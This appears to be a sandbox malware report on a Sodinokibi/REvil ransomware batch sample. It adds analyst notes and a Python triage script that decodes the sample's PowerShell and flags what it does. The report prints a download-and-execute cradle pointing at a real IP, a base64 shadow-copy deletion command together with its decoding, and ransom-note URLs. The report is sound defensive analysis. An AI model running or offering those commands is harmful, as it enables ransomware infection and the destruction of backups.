Analysis
max time kernel: 36s
max time network: 55s
platform: windows7_x64
resource: win7v200430
submitted: 01-06-2020 14:10
Static task: static1
Behavioral task: behavioral1
  Sample: 02025aebdb58d5c91227c70c8d753db5.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 02025aebdb58d5c91227c70c8d753db5.bat
  Resource: win10v200430
General
Target: 02025aebdb58d5c91227c70c8d753db5.bat
Size: 217B
MD5: abbe954f66b1dd339f454ca325488e57
SHA1: ecbf3a90c0936599cb41a907bd278fb7f9c0dc23
SHA256: 2bba8f17fc1ba279cde43a2555b981ff02d563e845d42800bb51973fe66b4a40
SHA512: 674f4a11ca927f19e02d1940711ca082069fa226e31cad3456370e990151f681ff6a611b8b25f42fb366748f10899bf26907b35770e790c08209d2ca1b9a97f3
Malware Config
Extracted (second-stage URL from the PowerShell command line):
  http://185.103.242.78/pastes/02025aebdb58d5c91227c70c8d753db5
Extracted (ransom note C:\2gqxv6-readme.txt):
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/72B60BE891E1358C
  http://decryptor.cc/72B60BE891E1358C
Signatures

Suspicious behavior: EnumeratesProcesses (77 IoCs)
  pid   process
  1296  powershell.exe  (75 entries)
  1540  powershell.exe  (2 entries)
Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
  description  ioc                                                                                        process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                       vssvc.exe
  Note: all four keys are written by vssvc.exe itself (PID 1816), not by the sample. They are consistent with the VSS service being started to serve the shadow-copy enumeration and deletion issued from PID 1540, so this signature is a side effect of that activity rather than a service configuration change.
Suspicious use of WriteProcessMemory (5 IoCs)
  description                          process         target process
  PID 1100 wrote to memory of 1296     cmd.exe         powershell.exe
  PID 1296 wrote to memory of 1540     powershell.exe  powershell.exe  (4 entries)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
  description                      pid   process
  Token: SeDebugPrivilege          1296  powershell.exe  (2 entries)
  Token: SeDebugPrivilege          1540  powershell.exe
  Token: SeBackupPrivilege         1816  vssvc.exe
  Token: SeRestorePrivilege        1816  vssvc.exe
  Token: SeAuditPrivilege          1816  vssvc.exe
  Token: SeTakeOwnershipPrivilege  1296  powershell.exe
Drops file in Program Files directory (17 IoCs)
  description                   ioc                                                                                   process
  File opened for modification  \??\c:\program files\AssertDebug.dwg                                                  powershell.exe
  File opened for modification  \??\c:\program files\BlockImport.xhtml                                                powershell.exe
  File opened for modification  \??\c:\program files\MergeSet.xlsx                                                    powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\2gqxv6-readme.txt           powershell.exe
  File opened for modification  \??\c:\program files\UnprotectCompare.ppsx                                            powershell.exe
  File opened for modification  \??\c:\program files\UnpublishRestore.xps                                             powershell.exe
  File opened for modification  \??\c:\program files\WaitConnect.xps                                                  powershell.exe
  File created                  \??\c:\program files (x86)\2gqxv6-readme.txt                                          powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\2gqxv6-readme.txt  powershell.exe
  File opened for modification  \??\c:\program files\ConvertFromCheckpoint.js                                         powershell.exe
  File opened for modification  \??\c:\program files\OutRequest.ini                                                   powershell.exe
  File opened for modification  \??\c:\program files\UseInvoke.xltm                                                   powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\2gqxv6-readme.txt      powershell.exe
  File created                  \??\c:\program files\2gqxv6-readme.txt                                                powershell.exe
  File opened for modification  \??\c:\program files\ResetAssert.vssx                                                 powershell.exe
  File opened for modification  \??\c:\program files\PushSync.tmp                                                     powershell.exe
  File opened for modification  \??\c:\program files\WatchOut.clr                                                     powershell.exe
  The "opened for modification" entries are the documents being encrypted in place; the ransom note 2gqxv6-readme.txt is created in each directory the encryptor walks.
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  description      ioc                                                                                                                process
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\721f3h7zn545w.bmp"  powershell.exe
Sodin / Sodinokibi / REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid   process
  1296  powershell.exe

Blacklisted process makes network request (1 IoC)
  flow  pid   process
  3     1296  powershell.exe
Processes

[1] C:\Windows\system32\cmd.exe  (PID 1100)
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\02025aebdb58d5c91227c70c8d753db5.bat"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1296)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02025aebdb58d5c91227c70c8d753db5');Invoke-YKSOHGHYRH;Start-Sleep -s 10000"
      This is a classic download cradle: the second stage is fetched over plain HTTP and evaluated in memory with IEX, then the function it defines (Invoke-YKSOHGHYRH) is called. Every ransomware indicator in this report (document modification, ransom-note creation, wallpaper change, privilege adjustment) is attributed to this PID, so the payload runs inside the 32-bit (SysWOW64) powershell.exe rather than being dropped to disk; the 10000-second Start-Sleep keeps that host process alive.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - Suspicious use of AdjustPrivilegeToken
      - Drops file in Program Files directory
      - Sets desktop wallpaper using registry
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Blacklisted process makes network request

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1540)
        Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Decoded (-e takes base64 of a UTF-16LE string): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
        This deletes every Volume Shadow Copy through WMI so that files cannot be restored from previous versions; it is the inhibit-recovery step that precedes encryption and is what brings vssvc.exe (below) into the tree.
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\vssvc.exe  (PID 1816)
    Command line: C:\Windows\system32\vssvc.exe
    - Modifies service
    - Suspicious use of AdjustPrivilegeToken
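As an added example (not part of the sandbox report, and not the sample's code), the helper below shows how an analyst can triage the command lines from a process tree like the one above: it decodes PowerShell -EncodedCommand arguments (base64 of UTF-16LE, including the abbreviated -e form used by PID 1540) and flags the IEX/DownloadString cradle of PID 1296, the WMI shadow-copy deletion of PID 1540, and the long Start-Sleep. The three command lines are copied from this report; the indicator names, regexes and the SAMPLE_CMDLINES/triage/summarize names are this example's own assumptions, not the sandbox's signature definitions.

```python
"""Triage PowerShell command lines from a sandbox process tree.

Decodes -EncodedCommand payloads (base64 of UTF-16LE) and flags the
behaviours seen in this report: an IEX download cradle, WMI shadow-copy
deletion and a long Start-Sleep that keeps the host process alive.
Indicator names and regexes are this example's own (assumptions), not the
sandbox's signature definitions.
"""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# The lookbehind stops "New-Object" / "Invoke-X" style names from matching.
_ENC_FLAG = re.compile(r"(?i)(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")

# Indicators are evaluated against the decoded command when one is present.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # Fetch-and-evaluate in memory: IEX fed by a WebClient or Invoke-WebRequest download.
    "download_cradle": re.compile(
        r"(?i)\b(?:iex|invoke-expression)\b.*?"
        r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b)"),
    # Inhibit recovery: WMI Win32_ShadowCopy.Delete(), vssadmin or wmic equivalents.
    "shadow_copy_deletion": re.compile(
        r"(?i)win32_shadowcopy.*?\.delete\(\)"
        r"|vssadmin(?:\.exe)?\s+delete\s+shadows"
        r"|wmic(?:\.exe)?\s+shadowcopy\s+delete"),
    # A sleep of 1000+ seconds is a common way to keep an in-memory payload's host alive.
    "long_sleep": re.compile(r"(?i)start-sleep\s+-s(?:econds)?\s+(\d{4,})"),
}
_URL = re.compile(r"https?://[^\s'\"<>)]+")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -e/-EncodedCommand argument, or None if absent/invalid."""
    for m in _ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy or -ep: starts with -e but is a different switch
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le").rstrip("\x00")
        except (ValueError, UnicodeDecodeError):
            return None  # not base64 or not UTF-16LE: treat as not an encoded command
    return None


def triage(cmdline: str) -> Dict[str, object]:
    """Decode if needed, then run every indicator over the effective command text."""
    decoded = decode_encoded_command(cmdline)
    effective = decoded if decoded is not None else cmdline
    hits = [name for name, rx in INDICATORS.items() if rx.search(effective)]
    return {
        "decoded": decoded,
        "effective": effective,
        "indicators": hits,
        "urls": _URL.findall(effective),
    }


def summarize(cmdlines: Dict[int, str]) -> Dict[int, List[str]]:
    """Map each PID to the indicator names that fired on its command line."""
    return {pid: list(triage(cmd)["indicators"]) for pid, cmd in cmdlines.items()}


# Command lines copied verbatim from the process tree in this report.
SAMPLE_CMDLINES: Dict[int, str] = {
    1100: r'cmd /c "C:\Users\Admin\AppData\Local\Temp\02025aebdb58d5c91227c70c8d753db5.bat"',
    1296: "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
          "\"IEX (New-Object System.Net.WebClient).DownloadString("
          "'http://185.103.242.78/pastes/02025aebdb58d5c91227c70c8d753db5');"
          "Invoke-YKSOHGHYRH;Start-Sleep -s 10000\"",
    1540: "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3"
          "AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABl"
          "AHQAZQAoACkAOwB9AA==",
}

if __name__ == "__main__":
    for pid, cmd in SAMPLE_CMDLINES.items():
        r = triage(cmd)
        print(f"PID {pid}: indicators={r['indicators']} urls={r['urls']}")
        if r["decoded"] is not None:
            print(f"  decoded: {r['decoded']}")
```

Running the block on the report's three command lines yields no indicators for the cmd.exe launcher, download_cradle plus long_sleep (and the paste URL) for PID 1296, and shadow_copy_deletion for PID 1540 once its -e blob is decoded. The decode step matters: none of the shadow-copy patterns match the raw base64, which is exactly why encoded commands are used.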